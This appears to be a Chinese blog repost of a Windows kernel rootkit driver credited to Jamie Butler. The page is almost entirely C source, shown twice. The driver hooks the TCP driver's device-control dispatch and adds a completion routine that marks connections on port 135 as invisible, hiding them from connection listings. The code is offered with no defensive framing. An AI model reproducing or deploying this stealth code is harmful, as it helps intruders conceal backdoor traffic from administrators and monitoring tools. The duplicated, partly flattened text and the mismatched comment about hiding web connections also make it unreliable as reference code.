HideTcpip.c-白红宇

HideTcpip.c

阅读量：4594 次

发布时间：2019-06-09

本文共 12033 字，大约阅读时间需要 40 分钟。

隐藏tcp端口，来自看雪

///// Filename Rootkit.c// // Author: Jamie Butler// Email:  james.butler@hbgary.com or butlerjr@acm.org//// Description: This is where the work gets done.//// Version: 1.0// #include "ntddk.h"#include "tdiinfo.h"//#include "stdio.h"//#include "stdlib.h"#include "Rootkit.h"   NTSTATUS DriverEntry(                   IN PDRIVER_OBJECT  DriverObject,                   IN PUNICODE_STRING RegistryPath                    ){        NTSTATUS                ntStatus;    OldIrpMjDeviceControl = NULL;    DriverObject->DriverUnload = RootkitUnload;        ntStatus = InstallTCPDriverHook();    if(!NT_SUCCESS(ntStatus))         return ntStatus;    return STATUS_SUCCESS;}NTSTATUS InstallTCPDriverHook(){    NTSTATUS       ntStatus;//  UNICODE_STRING deviceNameUnicodeString;//  UNICODE_STRING deviceLinkUnicodeString;            UNICODE_STRING deviceTCPUnicodeString;    WCHAR deviceTCPNameBuffer[]  = L"\\Device\\Tcp";    pFile_tcp  = NULL;    pDev_tcp   = NULL;    pDrv_tcpip = NULL;    RtlInitUnicodeString (&deviceTCPUnicodeString, deviceTCPNameBuffer);    ntStatus = IoGetDeviceObjectPointer(&deviceTCPUnicodeString, FILE_READ_DATA, &pFile_tcp, &pDev_tcp);    if(!NT_SUCCESS(ntStatus))     {            DbgPrint("读取失败!");        return ntStatus;    }    DbgPrint("读取成功!");    pDrv_tcpip = pDev_tcp->DriverObject;    OldIrpMjDeviceControl = pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL];     if (OldIrpMjDeviceControl)        InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)HookedDeviceControl);        return STATUS_SUCCESS;}NTSTATUS HookedDeviceControl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){    PIO_STACK_LOCATION      irpStack;    ULONG                   ioTransferType;    TDIObjectID             *inputBuffer;    DWORD                    context;    //DbgPrint("The current IRP is at %x\n", Irp);    // Get a pointer to the current location in the Irp. This is where    // the function codes and parameters are located.    irpStack = IoGetCurrentIrpStackLocation (Irp);    switch (irpStack->MajorFunction)     {        case IRP_MJ_DEVICE_CONTROL:            if ((irpStack->MinorFunction == 0) && \                (irpStack->Parameters.DeviceIoControl.IoControlCode == IOCTL_TCP_QUERY_INFORMATION_EX))            {                ioTransferType = irpStack->Parameters.DeviceIoControl.IoControlCode;                ioTransferType &= 3;                if (ioTransferType == METHOD_NEITHER) // Need to know the method to find input buffer                {                    inputBuffer = (TDIObjectID *) irpStack->Parameters.DeviceIoControl.Type3InputBuffer;                                        // CO_TL_ENTITY is for TCP and CL_TL_ENTITY is for UDP                    if (inputBuffer->toi_entity.tei_entity == CO_TL_ENTITY)                    {                         DbgPrint("Input buffer %x\n",inputBuffer);                        if ((inputBuffer->toi_id == 0x101) || (inputBuffer->toi_id == 0x102) || (inputBuffer->toi_id == 0x110))                        {                            // Call our completion routine if IRP successful                            irpStack->Control = 0;                            irpStack->Control |= SL_INVOKE_ON_SUCCESS;                             // Save old completion routine if present                            irpStack->Context = (PIO_COMPLETION_ROUTINE) ExAllocatePool(NonPagedPool, sizeof(REQINFO));                            ((PREQINFO)irpStack->Context)->OldCompletion = irpStack->CompletionRoutine;                             ((PREQINFO)irpStack->Context)->ReqType       = inputBuffer->toi_id;                            // Setup our function to be called on completion of IRP                            irpStack->CompletionRoutine = (PIO_COMPLETION_ROUTINE)IoCompletionRoutine;                        }                    }                }            }        break;                default:        break;    }    return OldIrpMjDeviceControl(DeviceObject, Irp);}NTSTATUS IoCompletionRoutine(IN PDEVICE_OBJECT DeviceObject,                              IN PIRP Irp,                              IN PVOID Context){    PVOID OutputBuffer;    DWORD NumOutputBuffers;    PIO_COMPLETION_ROUTINE p_compRoutine;    DWORD i;    // Connection status values:    // 0 = Invisible    // 1 = CLOSED    // 2 = LISTENING    // 3 = SYN_SENT    // 4 = SYN_RECEIVED    // 5 = ESTABLISHED    // 6 = FIN_WAIT_1    // 7 = FIN_WAIT_2    // 8 = CLOSE_WAIT    // 9 = CLOSING    // ...    OutputBuffer = Irp->UserBuffer;    p_compRoutine = ((PREQINFO)Context)->OldCompletion;    if (((PREQINFO)Context)->ReqType == 0x101)    {        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO101);        for(i = 0; i < NumOutputBuffers; i++)        {            // Hide all Web connections            if (HTONS(((PCONNINFO101)OutputBuffer)[i].src_port) == 135)                ((PCONNINFO101)OutputBuffer)[i].status = 0;        }    }    else if (((PREQINFO)Context)->ReqType == 0x102)    {        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO102);        for(i = 0; i < NumOutputBuffers; i++)        {            // Hide all Web connections            if (HTONS(((PCONNINFO102)OutputBuffer)[i].src_port) == 135)                ((PCONNINFO102)OutputBuffer)[i].status = 0;        }    }    else if (((PREQINFO)Context)->ReqType == 0x110)    {        NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO110);        for(i = 0; i < NumOutputBuffers; i++)        {            // Hide all Web connections            if (HTONS(((PCONNINFO110)OutputBuffer)[i].src_port) == 135)                ((PCONNINFO110)OutputBuffer)[i].status = 0;        }    }    ExFreePool(Context);    /*    for(i = 0; i < NumOutputBuffers; i++)    {        DbgPrint("Status: %d",OutputBuffer[i].status);        DbgPrint(" %d.%d.%d.%d:%d",OutputBuffer[i].src_addr & 0xff,OutputBuffer[i].src_addr >> 8 & 0xff, OutputBuffer[i].src_addr >> 16 & 0xff,OutputBuffer[i].src_addr >> 24,HTONS(OutputBuffer[i].src_port));        DbgPrint(" %d.%d.%d.%d:%d\n",OutputBuffer[i].dst_addr & 0xff,OutputBuffer[i].dst_addr >> 8 & 0xff, OutputBuffer[i].dst_addr >> 16 & 0xff,OutputBuffer[i].dst_addr >> 24,HTONS(OutputBuffer[i].dst_port));    }*/    if ((Irp->StackCount > (ULONG)1) && (p_compRoutine != NULL))    {        return (p_compRoutine)(DeviceObject, Irp, NULL);    }    else    {        return Irp->IoStatus.Status;    }}NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject){    if (OldIrpMjDeviceControl)        InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)OldIrpMjDeviceControl);        if (pFile_tcp != NULL)        ObDereferenceObject(pFile_tcp);    pFile_tcp = NULL;    return STATUS_SUCCESS;}

/ Filename Rootkit.c// // Author: Jamie Butler// Email: james.butler@hbgary.com or butlerjr@acm.org Description: This is where the work gets done. Version: 1.0//

#include "ntddk.h"#include "tdiinfo.h"//#include "stdio.h"//#include "stdlib.h"

#include "Rootkit.h" NTSTATUS DriverEntry( IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath){ NTSTATUS ntStatus;

OldIrpMjDeviceControl = NULL;

DriverObject->DriverUnload = RootkitUnload;ntStatus = InstallTCPDriverHook();if(!NT_SUCCESS(ntStatus)) return ntStatus;

return STATUS_SUCCESS;}

NTSTATUS InstallTCPDriverHook(){ NTSTATUS ntStatus;// UNICODE_STRING deviceNameUnicodeString;// UNICODE_STRING deviceLinkUnicodeString; UNICODE_STRING deviceTCPUnicodeString;WCHAR deviceTCPNameBuffer[] = L"\\Device\\Tcp"; pFile_tcp = NULL;pDev_tcp = NULL;pDrv_tcpip = NULL;

RtlInitUnicodeString (&deviceTCPUnicodeString, deviceTCPNameBuffer);ntStatus = IoGetDeviceObjectPointer(&deviceTCPUnicodeString, FILE_READ_DATA, &pFile_tcp, &pDev_tcp);if(!NT_SUCCESS(ntStatus)) {DbgPrint("读取失败!");return ntStatus;}DbgPrint("读取成功!");pDrv_tcpip = pDev_tcp->DriverObject;

OldIrpMjDeviceControl = pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL]; if (OldIrpMjDeviceControl)InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)HookedDeviceControl);return STATUS_SUCCESS;}

NTSTATUS HookedDeviceControl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ PIO_STACK_LOCATION irpStack; ULONG ioTransferType;TDIObjectID *inputBuffer;DWORDcontext;

//DbgPrint("The current IRP is at %x\n", Irp);

// Get a pointer to the current location in the Irp. This is where // the function codes and parameters are located. irpStack = IoGetCurrentIrpStackLocation (Irp);

switch (irpStack->MajorFunction) { case IRP_MJ_DEVICE_CONTROL:if ((irpStack->MinorFunction == 0) && \(irpStack->Parameters.DeviceIoControl.IoControlCode == IOCTL_TCP_QUERY_INFORMATION_EX)){ioTransferType = irpStack->Parameters.DeviceIoControl.IoControlCode;ioTransferType &= 3;if (ioTransferType == METHOD_NEITHER) // Need to know the method to find input buffer{inputBuffer = (TDIObjectID *) irpStack->Parameters.DeviceIoControl.Type3InputBuffer;// CO_TL_ENTITY is for TCP and CL_TL_ENTITY is for UDPif (inputBuffer->toi_entity.tei_entity == CO_TL_ENTITY){ DbgPrint("Input buffer %x\n",inputBuffer);if ((inputBuffer->toi_id == 0x101) || (inputBuffer->toi_id == 0x102) || (inputBuffer->toi_id == 0x110)){// Call our completion routine if IRP successfulirpStack->Control = 0;irpStack->Control |= SL_INVOKE_ON_SUCCESS;

// Save old completion routine if presentirpStack->Context = (PIO_COMPLETION_ROUTINE) ExAllocatePool(NonPagedPool, sizeof(REQINFO));

((PREQINFO)irpStack->Context)->OldCompletion = irpStack->CompletionRoutine; ((PREQINFO)irpStack->Context)->ReqType = inputBuffer->toi_id;

// Setup our function to be called on completion of IRPirpStack->CompletionRoutine = (PIO_COMPLETION_ROUTINE)IoCompletionRoutine;}}}}break;default:break; }

return OldIrpMjDeviceControl(DeviceObject, Irp);}

NTSTATUS IoCompletionRoutine(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp, IN PVOID Context){PVOID OutputBuffer; DWORD NumOutputBuffers;PIO_COMPLETION_ROUTINE p_compRoutine;DWORD i;

// Connection status values:// 0 = Invisible// 1 = CLOSED// 2 = LISTENING// 3 = SYN_SENT// 4 = SYN_RECEIVED// 5 = ESTABLISHED// 6 = FIN_WAIT_1// 7 = FIN_WAIT_2// 8 = CLOSE_WAIT// 9 = CLOSING// ...

OutputBuffer = Irp->UserBuffer;p_compRoutine = ((PREQINFO)Context)->OldCompletion;

if (((PREQINFO)Context)->ReqType == 0x101){NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO101);for(i = 0; i < NumOutputBuffers; i++){// Hide all Web connectionsif (HTONS(((PCONNINFO101)OutputBuffer)[i].src_port) == 135)((PCONNINFO101)OutputBuffer)[i].status = 0;}}else if (((PREQINFO)Context)->ReqType == 0x102){NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO102);for(i = 0; i < NumOutputBuffers; i++){// Hide all Web connectionsif (HTONS(((PCONNINFO102)OutputBuffer)[i].src_port) == 135)((PCONNINFO102)OutputBuffer)[i].status = 0;}}else if (((PREQINFO)Context)->ReqType == 0x110){NumOutputBuffers = Irp->IoStatus.Information / sizeof(CONNINFO110);for(i = 0; i < NumOutputBuffers; i++){// Hide all Web connectionsif (HTONS(((PCONNINFO110)OutputBuffer)[i].src_port) == 135)((PCONNINFO110)OutputBuffer)[i].status = 0;}}

ExFreePool(Context);

/*for(i = 0; i < NumOutputBuffers; i++){DbgPrint("Status: %d",OutputBuffer[i].status);DbgPrint(" %d.%d.%d.%d:%d",OutputBuffer[i].src_addr & 0xff,OutputBuffer[i].src_addr >> 8 & 0xff, OutputBuffer[i].src_addr >> 16 & 0xff,OutputBuffer[i].src_addr >> 24,HTONS(OutputBuffer[i].src_port));DbgPrint(" %d.%d.%d.%d:%d\n",OutputBuffer[i].dst_addr & 0xff,OutputBuffer[i].dst_addr >> 8 & 0xff, OutputBuffer[i].dst_addr >> 16 & 0xff,OutputBuffer[i].dst_addr >> 24,HTONS(OutputBuffer[i].dst_port));}*/

if ((Irp->StackCount > (ULONG)1) && (p_compRoutine != NULL)){return (p_compRoutine)(DeviceObject, Irp, NULL);}else{return Irp->IoStatus.Status;}}

NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject){if (OldIrpMjDeviceControl)InterlockedExchange ((PLONG)&pDrv_tcpip->MajorFunction[IRP_MJ_DEVICE_CONTROL], (LONG)OldIrpMjDeviceControl);if (pFile_tcp != NULL)ObDereferenceObject(pFile_tcp);pFile_tcp = NULL;

return STATUS_SUCCESS;}

转载于:https://www.cnblogs.com/passedbylove/p/11223794.html

你可能感兴趣的文章